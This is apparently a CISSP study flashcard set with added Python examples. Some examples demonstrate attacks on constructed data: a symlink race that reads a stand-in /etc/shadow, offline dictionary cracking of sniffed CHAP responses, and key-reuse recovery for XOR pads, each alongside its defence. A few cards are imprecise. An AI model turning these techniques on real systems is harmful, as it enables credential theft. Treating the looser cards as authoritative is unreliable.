Requires deduction: there is a mystery to be solved and lower level details provide the clues.

Sarbanes-Oxley Act of 2002 (SOX)

Requires disclosure, auditor independence, and internal security controls. i.e risk assessment. Intentional violation of SOX can result in criminal charges.

Gramm-Leach-Bliley Act (GLBA)

Requires financial institutions to protect the confidentiality and integrity of consumer financial information. Forced them to notify consumers of their privacy practices.

Database Security

Requires security precautions, inference controls and polyinstantiation

13:RST

Reset (tear down) a connection

General DRP

Respond Activate Team Communicate Assess Reconstitution

Cryptanalysis

Science of breaking encrypted

Steganography

Science of hidden communications. Hide inside image, Encoding in pixels as bit streams.

Scrum

Scrum development model (named after a scrum in the sport of rugby) is an Agile model first described in "The New New Product Development Game". Holistic approach to Software Development.

SESAME

Secure European System for Applications in a Multi-vendor Environment. Single sign-on system that supports heterogeneous environments. The addition of public key (asymmetric) encryption is the most compelling feature. It addresses one of the biggest weaknesses in Kerberos: the plaintext storage of symmetric keys.

SHA-1, SHA-2

Secure Hashing Algorithm. Announced in 1993 and 2001 respectively. SHA-1 produces a 160-bit digest. SHA-2 has 224-, 256-, 384-, and 512-bit digest lengths.

SLA

Service Level Agreements are vital when dealing with third-party development shops

SOA

Service Oriented Architecture. Attempts to reduce application architecture down to a functional unit of a service. SOA is intended to allow multiple heterogeneous applications to be consumers of services.

OSI Model

Seven layer model. APSTNDP

Shared Demarc

Shared Telecom Demarcation Point. Where the ISP's responsibility ends and the customer's begins. Should employ strong physical access controls.

STP

Shielded Twisted Pair/Coaxial. Better than UTP

Active Response NIPS

Shoots down malicious traffic via a variety of methods, including forging TCP RST segments to source or destination (or both), or sending ICMP port, host, or network unreachable to the source.

Redundant Network Architecture

Should any single circuit or site go down, at least one alternate path is available

Positive Pressure Drain

Should be employed by HVAC. Means air and water should be expelled from the building. Water should drain away.

Object Reuse

Should be prevented. The act of recovering information from previously-used objects, such as computer files.

System Config Reevaluation.

Should happen every 3 years.

Employee Termination

Should result in immediate revocation of all employee access. An organization's worst enemy can be a disgruntled former employee. Termination should be fair.

SDN

Software Defined Networking (SDN) separates a router's control plane from the data (forwarding) plane.

Open Source

Software or source code that is publicly available.

SSD

Solid State Drive, a combination of flash memory(EEPROM) and DRAM

Type 3

Something you are: Biometric

Type 2

Something you have: Badge

Type 1

Something you know: PIN

GPS/ IP and Geo-Location

Somewhere you are...

Striping

Spreading data writes across multiple disks to achieve performance gains, used by some levels of RAID

SDLC

Synchronous Data Link Control is a synchronous Layer 2 WAN protocol that uses polling to transmit data. Polling is similar to token passing.

SONET

Synchronous Optical Networking. Carries multiple T-carrier circuits via fiber optic cable. Physical fiber ring for redundancy.

SONET

Synchronous Optical Networking: multiple T-carrier circuits via fiber optic cable

SDLC 2

System Concept Development

OpenFlow

TCP protocol that uses TLS encryption

Relation

Table

Garbage Collection

Takes care of old blocks. Unused and unerased blocks are moved out of the way and erased in the background. Identifies unneeded data and clears the blocks.

Encapsulation

Takes information from a higher layer and adds a header to it, treating the higher-layer information as data. One layer's header is another layer's data.

Telnet

Telnet provides terminal emulation over a network. Provides no confidentiality and has limited integrity.

BCI

The Business Continuity Institute. The Good Practice Guidelines (GPG) are the independent body of knowledge for good Business Continuity practice worldwide.

OWASP

The Open Web Application Security Project. Represents one of the best application security resources. OWASP provides a tremendous number of free resources dedicated to improving an organization's security posture.

SIEM

The Security Information and Event Manager is a primary tool used to ease the correlation of data across disparate sources

UDP

User Datagram Protocol. A simpler and faster cousin to TCP. UDP has no handshake, session, or reliability. Connectionless. Used for applications that are Lossy.

SDLC

The Systems Development Life Cycle. SDLC is used across the IT industry, but SDLC focuses on security when used in context of the exam. Standards are based on NIST

Brute Force

The attacker calculates the hash outputs for every possible password

Birthday Attack

The birthday attack is used to create hash collisions. Eg: If you add 22/365 + 21/365 + 20/365 + 19/365 ... + 1/365

Crux of SDLC

The concepts of security.

Security Domain

The list of objects a subject is allowed to access. Domains are groups of subjects. Confidential, Secret, and Top Secret are three security domains used by the DoD.

***NOTE***

The most important objective for all controls is personnel safety. This is especially true for DRP

Ring -1

The newest mode of operation that utilizes a hypervisor(virtual machine, Intel VT, AMD-V).

Enticement

The perpetrator involved is determined to have already broken a law or is intent on doing so.

ARPAnet

The predecessor of the Internet

Tailoring

The process of customizing a standard for an organization

Scoping

The process of determining which portions of a standard will be employed by an organization

Recovery

The recovery phase involves cautiously restoring the system or systems to operational status.

Reporting

The reporting phase of incident handling occurs throughout the process, beginning with detection. Reporting must begin immediately upon detection of malicious activity.

Cryptology

The science of secure communications.

VoIP

Voice over Internet Protocol (VoIP) carries voice via data networks, a fundamental change from analog POTS (Plain Old Telephone Service), which remains in use after over 100 years

Background Check

Thorough investigation should be conducted before hiring someone. A criminal record check should be conducted. All experience and education, certifications verified.

Commandment #10

Thou shalt always use a computer in ways that ensure consideration and respect for your fellow humans.

Commandment #8

Thou shalt not appropriate other people's intellectual output.

Commandment #6

Thou shalt not copy or use proprietary software for which you have not paid.

Commandment #2

Thou shalt not interfere with other people's computer work.

Commandment #3

Thou shalt not snoop around in other people's computer files.

Commandment #5

Thou shalt not use a computer to bear false witness.

Commandment #1

Thou shalt not use a computer to harm other people.

Commandment #4

Thou shalt not use a computer to steal.

Commandment #7

Thou shalt not use other people's computer resources without authorization or proper compensation.

Commandment #9

Thou shalt think about the social consequences of the program you are writing or the system you are designing.

KLOC

Thousand(K) Lines Of Code

Misuse Case Testing

To formally model, again most likely using UML, how security impact could be realized by an adversary abusing the application

TCP

Transmission Control Protocol is a reliable Layer 4 protocol. Uses a three-way handshake to create reliable connections across a network

TLS

Transport Layer Security is the latest version of SSL, equivalent to SSL version 3.1. May be used to encrypt many types of data

TCP Flags

URG ACK PSH RST SYN FIN

Computer Fraud and Abuse Act - Title 18 Section 1030

US Law Pertaining to computer crimes. Attacks on protected computers, government, financial computers. $5,000 damage considered criminal.

Flash Memory

USB Thumb Drives. Specific type of EEPROM used for small portable disk drives. Magnetic field will not erase Flash Memory.

100baseT

UTP means 100 megabit, baseband, twisted pair.

Motion Detectors

Ultrasonic and microwave work like "Doppler Radar": they bounce a signal. Photoelectric sends a beam of light and alerts if the beam is broken. These sensors are active. Passive infrared detects body heat. All are physical intrusion detection.

UPS

Uninterruptible Power Supplies provide protection against electrical failure.

Primary Key

Unique value in table

Need to Know

User must need to know that specific piece of information before accessing it.

False Positive

User surfs the Web to an allowed site, and NIDS alerts

True Negative

User surfs the Web to an allowed site, and NIDS is silent

Mode of Operation(Access control)

Uses either a discretionary access control implementation or a mandatory access control implementation. 4 Modes: 1. Dedicated 2. System High 3. Compartmented 4. Multilevel

One-Time Pad

Uses identical paired pads of random characters, with a set number of characters per page. Eg: Y + C = B, then B - C = Y. The one-time pad is the only encryption method that is mathematically proven to be secure, if the following three conditions are met.

Fiber Optic Network Cable

Uses light to carry information and can carry a tremendous amount of it, past 50 miles. Multimode uses light dispersion. Single mode uses one strand.

Asset Value(AV)

Value of an asset

Risk = Threat × Vulnerability Equation

Vulnerability scanning factor equating

Ward

Warded locks must turn a key through channels (called wards).

IAB Practice 3

Wastes resources (people, capacity , computer) through such actions.

WDM

Wavelength Division Multiplexing allows multiple signals to be carried via the same fiber

TFTP

Which runs on UDP port 69. It provides a simpler way to transfer files and is often used for saving router configurations or "bootstrapping"

WAN

Wide Area Network, typically covering cities, states, or countries

SAM File

Windows stores hashes for passwords on the Local Machine and Domain Controller in this file.

WLAN

Wireless Local Area Network. Generally has no way to assure availability.

802.11

Wireless technology. 802.11i is the first variation to provide reasonable security.

Civil Law(Common Law)

Within common law, civil law refers to laws put in place in order to compensate a victim monetarily for damages.

Antivirus software

designed to prevent malware infections

Penetration Tester must...

always protect data and system integrity.

DNS cache poisoning attack

an attempt to trick a caching DNS server into caching a forged response.

Prototyping

an iterative approach that breaks projects into smaller tasks, creating multiple mockups (prototypes) of system design features.

Greenfield

an undeveloped lot of land

Relational Database

contain two-dimensional tables of related data.

Database Dictionary

contains a description of the database tables.

Decryption

converts ciphertext into plaintext

Static Routes

fixed routing entries stating "The route for network 10.0.0.0/8 routes via router 192.168.2.8." Small/Home Offices have static "default" route that sends all external traffic to one router. Set preferences via specific routing protocols

Operating System:

• System events • Audit records

Authentication Server (AS)

a server that authenticates a supplicant (802.1X)

Attribute

A column in a table (relation).

Well-Formed Transactions

Ability to enforce control over applications. This process is comprised of the "access control triple:" user, transformation procedure, and constrained data item.

Inactive Account Policy

Accounts inactive for more than 30 consecutive days. Identifying new accounts that have not been used for more than 10 days following their creation

NIST SDLC Step 11

Accreditation: The formal authorization by the accrediting (management) official for system operation and an explicit acceptance of risk.

ACK (TCP flag)

Acknowledge received data

Acquisition of Media

Acquisition will leverage binary backups and the use of hashing algorithms to verify the integrity of the binary images

Canons(2)

Act honorably, honestly, justly, responsibly, and legally

ARP

Address Resolution Protocol is used to translate between Layer 2 MAC addresses and Layer 3 IP addresses. Think ARP Cache poisoning(MitM)

Virtualization

Adds a software layer (the hypervisor) between the operating system and the computer hardware, allowing stock operating systems to run unmodified as guests.

Access Control Categories

Administrative, Technical, Physical.

Overwriting

"Deleting" only removes the entry from the File Allocation Table (FAT) and marks the data blocks as "unallocated"; the data itself remains on disk until overwritten. Overwriting writes new data over every block so the original contents cannot be recovered.

BS-25999 and ISO 22301

Part 1, the Code of Practice, provides business continuity management best-practice recommendations. Part 2, the Specification, provides the requirements for a Business Continuity Management System (BCMS) based on BCM best practice. ISO 22301 specifies the requirements for setting up and managing an effective BCMS for any organization of any size or type.

WORM

(Write Once Read Many) Storage can be written to once and read many times. Supports legal or regulatory compliance. E.g.: CD-R (CD-RW and DVD-RW are not WORM media). Some Digital Linear Tape (DLT) drives and media support WORM.

Halon Replacements

- Argon -FE-13 -FM-200 -Inergen

Core Principles of PCI-DSS

- Build and Maintain a Secure Network and Systems. - Protect Cardholder Data -Maintain Vulnerability Management Program -Implement Strong Access Control Measures. -Regularly Monitor and Test Networks. -Maintain an Information Security Policy.

"PASS" method (For Portable Extinguishers)

- Pull the pin - Aim low, at the base of the fire - Squeeze the handle - Sweep side to side

5 Components of PKI

-Certification Authorities (CAs) that issue and revoke certificates -Organizational Registration Authorities (ORAs) that vouch for the binding between public keys and certificate holders -Certificate holders that are issued certificates and can sign digital documents -Clients that validate digital signatures and their certification paths from a known public key -Repositories that store and make available certificates and Certificate Revocation Lists (CRLs)

IPv6 to MAC

-Take the MAC address: 00:0c:29:ef:11:36 -Embed the "fffe" constant in the middle two bytes: 00:0c:29:ff:fe:ef:11:36 -Set the "Universal Bit": 02:0c:29:ff:fe:ef:11:36 -Prepend the network prefix & convert to ":" format: fc01:0000:0000:0000:020c:29ff:feef:1136 -Convert one string of repeating zeroes to "::": fc01::20c:29ff:feef:1136
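
The derivation above, as an added example that is not part of the study set: it builds the EUI-64 interface identifier from the card's MAC address and prefix (fc01::/64), and also reverses it, which is the security point the card leaves implicit: an IPv6 address formed this way leaks the hardware address and vendor OUI to anyone who sees it.

```python
"""Added example (not from the study set): the EUI-64 derivation the card
walks through, forward and backward. The MAC 00:0c:29:ef:11:36 and the
prefix fc01::/64 are the card's own values."""
import ipaddress
from typing import Optional


def mac_to_eui64(mac: str) -> bytes:
    """Return the 8-byte EUI-64 interface identifier for a 48-bit MAC:
    split OUI/NIC halves, insert ff:fe, toggle the universal/local bit."""
    octets = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(octets) != 6:
        raise ValueError("MAC address must be 6 octets")
    eui = bytearray(octets[:3] + b"\xff\xfe" + octets[3:])
    eui[0] ^= 0x02  # U/L bit is bit 1 of the first octet (0x00 -> 0x02)
    return bytes(eui)


def mac_to_ipv6(mac: str, prefix: str = "fc01::/64") -> str:
    """Combine a /64 prefix with the EUI-64 interface ID."""
    net = ipaddress.IPv6Network(prefix)
    if net.prefixlen != 64:
        raise ValueError("EUI-64 addressing needs a /64 prefix")
    iid = int.from_bytes(mac_to_eui64(mac), "big")
    return str(ipaddress.IPv6Address(int(net.network_address) | iid))


def ipv6_to_mac(addr: str) -> Optional[str]:
    """Reverse the derivation, or None if the interface ID is not EUI-64 shaped.
    This reversibility is why SLAAC addresses built from the MAC leak the
    hardware address (and vendor OUI) to anyone who sees the IPv6 address."""
    iid = int(ipaddress.IPv6Address(addr)) & ((1 << 64) - 1)
    b = bytearray(iid.to_bytes(8, "big"))
    if b[3:5] != b"\xff\xfe":
        return None
    b[0] ^= 0x02
    return ":".join(f"{x:02x}" for x in b[:3] + b[5:])


if __name__ == "__main__":
    addr = mac_to_ipv6("00:0c:29:ef:11:36")
    print(addr, "->", ipv6_to_mac(addr))
```

Privacy extensions (RFC 4941) exist precisely to avoid this: they replace the EUI-64 interface ID with a random one, so ipv6_to_mac() returns None for such addresses.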

BCP/DRP Items:

1. Executive management support is needed for initiating the plan. 2. Executive management support is needed for final approval of the plan. 3. Executive management must demonstrate due care and due diligence and be held liable under applicable laws/regulations.

Forensic Phases

1. Identification of potential evidence 2. Acquisition of that evidence 3. Analysis of the evidence 4. Production of a report

Race Condition /etc/shadow

1. If the file "test" is readable by the user 2. Attacker deletes "test," creates symbolic link from "test" to /etc/shadow 3. Run another process 4. Then open the file "test" (now a symbolic link to /etc/shadow)
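
The check-then-use window described above, as an added example that is not part of the study set. It stages the attacker's swap in a temporary directory (a constructed "secret" file stands in for /etc/shadow so the demo runs unprivileged), shows the access()-then-open() pattern following the symlink, and the hardened form: open with O_NOFOLLOW, then verify the object actually opened with fstat on the descriptor rather than stat on the name. POSIX only.

```python
"""Added example (not from the study set): the TOCTOU symlink race the card
describes, and how to close it. POSIX-only (uses O_NOFOLLOW). All paths are
constructed in a temp directory; 'secret' stands in for /etc/shadow."""
import os
import stat
import tempfile


def read_unsafe(path: str) -> bytes:
    """Vulnerable: access() check, then a separate open() that follows symlinks.
    An attacker who replaces 'path' with a symlink between the two calls wins."""
    if not os.access(path, os.R_OK):
        raise PermissionError(path)
    with open(path, "rb") as f:  # follows the symlink to the real target
        return f.read()


def read_safe(path: str) -> bytes:
    """Hardened: refuse to follow symlinks at open(), then check what we
    actually opened via fstat on the fd (no second lookup by name)."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_NOCTTY)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError(f"{path}: not a regular file")
        if st.st_uid != os.geteuid():
            raise PermissionError(f"{path}: unexpected owner uid {st.st_uid}")
        return os.read(fd, st.st_size)
    finally:
        os.close(fd)


def demo() -> dict:
    """Stage the attacker's swap and report what each reader does."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret")  # stand-in for /etc/shadow
        test = os.path.join(d, "test")
        secret_content = b"root:$6$...:19000:0:99999:7:::\n"  # constructed
        with open(secret, "wb") as f:
            f.write(secret_content)
        with open(test, "wb") as f:
            f.write(b"harmless\n")
        # Attacker (steps 2-4 of the card): delete 'test', point it at the secret.
        os.unlink(test)
        os.symlink(secret, test)
        leaked = read_unsafe(test)
        try:
            read_safe(test)
            blocked = False
        except OSError:  # ELOOP from O_NOFOLLOW, or our own PermissionError
            blocked = True
        return {
            "unsafe_leaked_secret": leaked == secret_content,
            "safe_blocked": blocked,
            "safe_reads_regular": read_safe(secret) == secret_content,
        }


if __name__ == "__main__":
    print(demo())
```

The fix is not a faster check but removing the second name lookup entirely: every decision is made on the file descriptor that will be read. In a setuid program, dropping privileges before the open is the other half of the mitigation.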

Expert System Example

1. If your computer is turned on a. Else: turn your computer on 2. Then if your monitor is turned on a. Else: turn your monitor on 3. Then if your OS is booted and you can open a cmd.exe prompt a. Else: repair OS 4. Then if you can ping 127.0.0.1 a. Else: check network interface configuration 5. Then if you can ping the local gateway a. Else: check local network connection 6. Then if you can ping Internet address 192.0.2.187 a. Else: check gateway connectivity 7. Then if you can ping syngress.com a. Else: check DNS

Five mistakes of Log Analysis

1. Logs are not reviewed on a regular and timely basis. 2. Audit logs and audit trails are not stored for a long enough time period. 3. Logs are not standardized or viewable by correlation toolsets—they are only viewable from the system being audited. 4. Log entries and alerts are not prioritized. 5. Audit records are only reviewed for the "bad stuff."

ISO 17799 11 Areas

1. Policy 2. Organization of Information Security 3. Asset Management 4. Human Resources Security 5. Physical and Environmental Security 6. Communications and Operations Management 7. Access Control 8. Information systems acquisition, development, and maintenance 9. Information security incident management. 10. Business continuity management 11. Compliance

8 Step Incident Handling Methodology

1. Preparation 2. Detection (aka Identification) 3. Response (aka Containment) 4. Mitigation (aka Eradication) 5. Reporting 6. Recovery 7. Remediation 8. Lessons Learned (aka Post-incident Activity, Post Mortem, or Reporting)

NIST Incident Response

1. Preparation 2. Detection and Analysis 3. Containment, Eradication and Recovery 4. Post-incident Activity

Object-Oriented Analysis and Design(OOAD) on NIDS

1. Sniffs packets from a network and converts them into pcap (packet capture) format; 2. Analyzes the packets for signs of attacks, which could include Denial of Service, client-side attacks, server-side attacks, web application attacks, and others; 3. If a malicious attack is found, the NIDS sends an alert. NIDS may send alerts via email, paging, syslog, or security information and event managers (SIEMs).

Class C

192.0.0.0 - 223.255.255.255 (first octet begins with bits 110). Each Class C network (/24) has 256 addresses, 254 usable for hosts.

TCP Header Fields

20 bytes minimum (without options): - Source and destination port - Sequence and acknowledgment numbers: keep full-duplex communication in sync - Data offset (header length) - TCP flags - Window size: amount of data that may be sent before receiving an acknowledgment - Checksum and urgent pointer. Clients connect from a high ephemeral port (e.g., 51870) to a low well-known server port (e.g., 22).
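
A parser for the fixed header described above, as an added example that is not part of the study set. The sample header bytes are constructed here (a SYN from ephemeral port 51870 to port 22); the builder exists only so the parser has something to parse.

```python
"""Added example (not from the study set): parse the 20-byte fixed TCP
header the card lists. SAMPLE_SYN is constructed: SYN from port 51870 to 22."""
import struct

# Bit positions of the flags in the low byte of the data-offset/flags field.
FLAG_NAMES = ["FIN", "SYN", "RST", "PSH", "ACK", "URG", "ECE", "CWR"]
HEADER_FMT = "!HHIIHHHH"  # network byte order, 20 bytes


def parse_tcp_header(data: bytes) -> dict:
    """Decode the fixed header; options (if any) are returned raw."""
    if len(data) < 20:
        raise ValueError("TCP header is at least 20 bytes")
    sport, dport, seq, ack, off_flags, window, csum, urg = struct.unpack(
        HEADER_FMT, data[:20])
    data_offset = (off_flags >> 12) * 4  # header length in bytes, incl. options
    if data_offset < 20 or data_offset > len(data):
        raise ValueError(f"bad data offset {data_offset}")
    flags = off_flags & 0xFF
    return {
        "src_port": sport, "dst_port": dport,
        "seq": seq, "ack": ack,
        "header_len": data_offset,
        "flags": [n for i, n in enumerate(FLAG_NAMES) if flags & (1 << i)],
        "window": window, "checksum": csum, "urgent": urg,
        "options": data[20:data_offset],
        "client_to_server": sport >= 49152 and dport < 1024,
    }


def build_tcp_header(sport: int, dport: int, seq: int, ack: int,
                     flags: list, window: int) -> bytes:
    """Build a 20-byte header (no options, zero checksum) for testing."""
    bits = 0
    for f in flags:
        bits |= 1 << FLAG_NAMES.index(f)
    return struct.pack(HEADER_FMT, sport, dport, seq, ack,
                       (5 << 12) | bits, window, 0, 0)


SAMPLE_SYN = build_tcp_header(51870, 22, 0x1234ABCD, 0, ["SYN"], 65535)
SAMPLE_SYNACK = build_tcp_header(22, 51870, 0x0BADF00D, 0x1234ABCE,
                                 ["SYN", "ACK"], 29200)

if __name__ == "__main__":
    print(parse_tcp_header(SAMPLE_SYN))
```

The data-offset check matters in practice: a header that claims more bytes than are present is how malformed packets trip up naive parsers, so it is rejected before any option bytes are sliced.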

Limited Broadcast Address

255.255.255.255

Graham-Denning Model

3 Part Model: Objects, Subjects, and Rules. Provides granular approach for interaction between subjects and objects. R1: Transfer Access R2: Grant access R3: Delete Access R4: Read Object R5: Create Object R6: Destroy Object R7: Create Subject R8: Destroy Subject

DoD Destruction Method (Gutmann Approach)

3, 7, or 35 successive overwrite passes respectively (DoD 5220.22-M-style methods use 3 or 7; Gutmann proposed 35). For undamaged modern magnetic media, a single successful overwrite pass is now commonly considered acceptable in industry to render data unrecoverable.

X86 CPU's

32 Bit Processors, CISC

Escrowed Encryption

A 3rd-party organization holds a copy of the public/private key pair. The private key is divided into two or more parts, each held in escrow, and released only with proper authorization. Offers a balance between privacy and the needs of law enforcement.

TCP/IP Model

4 layer model. Network Access, Internet, Transport, Application.

Divestitures

AKA de-mergers or de-acquisitions. One company becomes two or more. The split of sensitive information needs to be monitored closely, as the risk of insider attacks will exist: old credentials, duplicate accounts, badges, security controls.

Administrative Law

AKA Regulatory Law is law enacted by government agencies. The executive branch of the U.S. Government can create administrative law without requiring input from the Legislative branch.

Encapsulation

AKA data hiding

Defense-in-Depth

AKA layered defenses, applies multiple safeguards(controls: measures to reduce risk) to protect an asset. Multiple controls help improve the confidentiality, integrity, and availability of your data.

Cybersquatting

Refers to an individual or organization registering or using, in bad faith, a domain name associated with another person's trademark. Typosquatting is a variant that registers common misspellings of the target domain.

Swapping

AKA, Paging. Uses Virtual Memory. Copies a block of memory to or from a disk.

Asynchronous Response Mode

ARM Secondary nodes may initiate communication with the primary

Canon(4)

Advance and protect the profession.

Dummy File

Also called a flag, is a file that is provided to the tester in place of a real file containing sensitive or protected data.

Traceability Matrix

Also called an RTM can be used to map customers' requirements to the software testing plan

Strong authentication

Also called multifactor authentication requires that the user present more than one authentication factor

Synthetic Transactions

Also called synthetic monitoring: involves building scripts or tools that simulate activities normally performed in an application

Southbridge(Bus)

Also called the I/O Controller Hub; connects input/output devices (e.g., keyboard, mouse, CD drive).

Northbridge(Bus)

Also called the Memory Controller Hub (MCH), connects the CPU to RAM and video memory.

Fetch & Execute

Also called "Fetch, Decode, Execute." CPUs fetch machine-language instructions (e.g., add 1+1): 1. Fetch 2. Decode 3. Execute 4. Write (save the result). These four steps take one clock cycle to complete.

Meeting Point Leader

Assures that all personnel are accounted for at the emergency meeting point. Avoid during evacuation

ATM

Asynchronous Transfer Mode. WAN technology that uses fixed length cells. 53 bytes long, with a 5-byte header and 48-byte data portion.

ARCNET(Deterministic)

Attached Resource Computer Network is a legacy LAN technology. ARCNET ran at 2.5 megabits and popularized the star topology

Known Key

Attacker knows something about the Key.

AOC

Attestation of Compliance

Server Rooms

Auditing physical access to server rooms is necessary to maintain physical security. Door security is key.

NIST SDLC Step 15

Audits and Monitoring: A system audit is a one-time or periodic event to evaluate security. Monitoring refers to an ongoing activity that examines either the system or the users.

CHAP

Challenge Handshake Authentication Protocol. More secure than PAP: the server sends a random challenge and the client returns a hash of the challenge combined with its password, so the password never crosses the wire in clear text. The CHAP server must store the password itself (not a hash), which is a weakness.
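
The exchange described above, as an added example that is not part of the study set. It follows RFC 1994 (MD5 over identifier, secret, challenge) with both sides' messages, then shows the two consequences the card hints at: a sniffed response cannot be replayed against a fresh challenge, but a sniffed challenge/response pair can be attacked offline against a word list, which is why weak passwords and the clear-text secret on the server matter. The user name, secret and word list are constructed sample values.

```python
"""Added example (not from the study set): the CHAP three-way exchange per
RFC 1994, replay resistance, and the offline dictionary attack it remains
exposed to. User, secret and word list are constructed sample values."""
import hashlib
import hmac
import os
from typing import Iterable, Optional

# The CHAP server must hold the shared secret itself, not a hash of it.
SERVER_SECRETS = {"alice": b"correct horse battery staple"}


def chap_challenge() -> tuple:
    """Server -> client: (identifier, random challenge)."""
    return os.urandom(1)[0], os.urandom(16)


def chap_response(ident: int, secret: bytes, challenge: bytes) -> bytes:
    """Client -> server: MD5(ID || secret || challenge)."""
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()


def chap_verify(user: str, ident: int, challenge: bytes, response: bytes) -> bool:
    """Server recomputes the expected response from its stored secret."""
    secret = SERVER_SECRETS.get(user)
    if secret is None:
        return False
    expected = chap_response(ident, secret, challenge)
    return hmac.compare_digest(expected, response)  # constant-time compare


def run_exchange(user: str, client_secret: bytes) -> dict:
    """One full handshake, then an attacker replays the sniffed response."""
    ident, challenge = chap_challenge()
    response = chap_response(ident, client_secret, challenge)
    authenticated = chap_verify(user, ident, challenge, response)
    ident2, challenge2 = chap_challenge()  # server issues a new challenge
    replay_accepted = chap_verify(user, ident2, challenge2, response)
    return {"authenticated": authenticated,
            "replay_accepted": replay_accepted,
            "captured": (ident, challenge, response)}


def offline_crack(captured: tuple, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Attacker holding a sniffed (ID, challenge, response) tries candidates
    offline; no further contact with the server is needed."""
    ident, challenge, response = captured
    for guess in wordlist:
        if chap_response(ident, guess, challenge) == response:
            return guess
    return None


if __name__ == "__main__":
    result = run_exchange("alice", SERVER_SECRETS["alice"])
    print(result["authenticated"], result["replay_accepted"])
    print(offline_crack(result["captured"], [b"password", SERVER_SECRETS["alice"]]))
```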

LEAP

Cisco-proprietary protocol released before 802.1X was finalized. Flaws, should not be used

***Exam Warning***

Clark-Wilson requires that users are authorized to access and modify data. It also requires that data is modified in only authorized ways.

Classful IPv4 Networks

Classes A - E. For normal networks, A - C

Gates

Classes I - IV ASTM F2200

CIDR

Classless Inter-Domain Routing allows far more flexible network sizes than those allowed by classful addresses.

Full-duplex

Communication can send and receive simultaneously (e.g., a telephone call); contrast half duplex.

Digital

Communications transfer data in bits: ones and zeroes

Centralized access control

Concentrates access control in one logical point for a system or organization. Instead of using local access control databases, systems authenticate via third-party authentication servers

Binary or Bit stream image

Creates an exact bit-for-bit replica of the original data, including unallocated space and slack space; required for forensic acquisition.

XSS

Cross-Site Scripting (XSS) leverages third-party execution of web scripting languages such as JavaScript within the security context of a trusted site.

Purpose(Policy)

Describes the need for policy to protect the confidentiality, integrity and availability of protected data.

Deterrent Controls

Deters users from performing actions on a system. Examples include a "beware of dog" sign.

SSL

Developed by Netscape for its web browser. Secure Sockets Layer (SSL) authenticates and provides confidentiality to web traffic; Transport Layer Security (TLS) is its successor. Used with HTTP as HTTPS. E.g., on connecting to a website the browser downloads the server's digital certificate, which includes its public key (asymmetric encryption), and uses it to establish the session.

SDLC 6

Development

NIST SDLC Step 4

Development/acquisition: The system is designed, purchased, programmed or developed.

Service Level Agreements

Dictate what is considered acceptable regarding things such as bandwidth, time to delivery, response times, etc.

DNS

Domain Name System, a distributed global hierarchical database that translates names to IP addresses. Uses both UDP and TCP (port 53). Two classic resolver functions: gethostbyname() (given a name, returns an IP address) and gethostbyaddr() (given an address, returns the name).

Deadbolt

The bolt extends into the strike plate; the door cannot be closed while the deadbolt is locked (extended).

Attestation

Ensures scrutiny has been applied to an organization's security posture. Attestation of security posture usually follows an audit. SAS 70 Review

XOR

Exclusive Or. The secret sauce behind modern encryption. Combining a key with a plaintext via XOR creates a ciphertext. XOR-ing the same key to the ciphertext restores the original plaintext.
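
XOR as described above, as an added example that is not part of the study set: the same function encrypts and decrypts, and the block also shows the failure the card's phrasing invites, reusing the key. When two messages share a keystream, XORing the ciphertexts cancels the key and leaves p1 XOR p2, so knowing one plaintext reveals the other. Plaintexts and key are constructed.

```python
"""Added example (not from the study set): XOR as encrypt and decrypt in one
operation, and the two-time-pad failure when a key is reused. Plaintexts
are constructed; the key is random per run."""
import os


def xor_bytes(a: bytes, b: bytes) -> bytes:
    if len(a) != len(b):
        raise ValueError("inputs must be the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def otp_encrypt(plaintext: bytes, key: bytes) -> bytes:
    """One-time pad: ciphertext = plaintext XOR key. The same call decrypts,
    because (p ^ k) ^ k == p. The key must be at least as long as the
    message; cycling a short key turns this into a trivially broken cipher."""
    if len(key) < len(plaintext):
        raise ValueError("key too short: never cycle a one-time pad key")
    return xor_bytes(plaintext, key[:len(plaintext)])


def two_time_pad_recover(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """If one key encrypted both messages, c1 ^ c2 == p1 ^ p2: the key has
    cancelled out. Knowing (or guessing) p1 yields p2 with no key at all."""
    return xor_bytes(xor_bytes(c1, c2), known_p1)


def demo() -> dict:
    p1 = b"ATTACK AT DAWN!"
    p2 = b"RETREAT AT DUSK"   # same length as p1 on purpose
    key = os.urandom(len(p1))
    c1 = otp_encrypt(p1, key)
    c2 = otp_encrypt(p2, key)  # key reuse: the mistake
    return {
        "roundtrip": otp_encrypt(c1, key),
        "key_cancels": xor_bytes(c1, c2) == xor_bytes(p1, p2),
        "recovered_p2": two_time_pad_recover(c1, c2, p1),
    }


if __name__ == "__main__":
    print(demo())
```

The same key-cancellation applies to any stream cipher whose keystream is reused (e.g., a nonce repeated with the same key), not just to literal one-time pads.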

Privileged Programs

Programs whose permission bits show an "s" in the execute position are setuid/setgid: they run with the privileges of the file's owner or group (often the superuser) rather than those of the invoking user.

PATRIOT Act of 2001

Expanded law enforcement's electronic monitoring capabilities: broader coverage for wiretaps, and search and seizure without immediate disclosure. Generally lessened judicial oversight of law enforcement.

Due Diligence

Expectation of staff/subordinate to exercise due care.

RAID 10(1 + 0)

Explicitly indicate the nesting, the configuration is that of a striped set of mirrors. System Redundancy

Chain of Custody

Expresses the reliability of evidence. Once evidence is acquired, full documentation must be maintained regarding the who, what, when, and where of its handling (e.g., signatures at every hand-off).

The Copyright Term Extension Act, 1998

Extended the Copyright term by 20 years. At the time, Author copyright was 50 years, 75 for Corporate.

EAP

Extensible Authentication Protocol is an authentication framework that describes many specific authentication protocols. Provides authentication at Layer 2"port based"

XML

Extensible Markup Language. A standard way to encode documents and data. XML is similar to HTML and used on the web but not tied to it; XML lets users define their own data formats.

EGP

Exterior Gateway Protocols BGP (Layer 3)

Doors

External facing hinges are a security concern.

Proxy Firewalls

Firewalls that act as intermediary servers. Both the packet filter and stateful firewalls pass traffic through or deny it. Proxies terminate connections.

Mantrap

First door locks before second can open.

Forensic Software Analysis

Focuses on comparing or reverse engineering software: reverse engineering malware is one of the most common examples. Investigators are often presented with a binary copy of a malicious program, and seek to deduce its behavior

Communications and Network Security

Focuses on the confidentiality, integrity and availability of data in motion.

Tailgating

Following an authorized person into a building without providing credentials

Business Continuity Planning

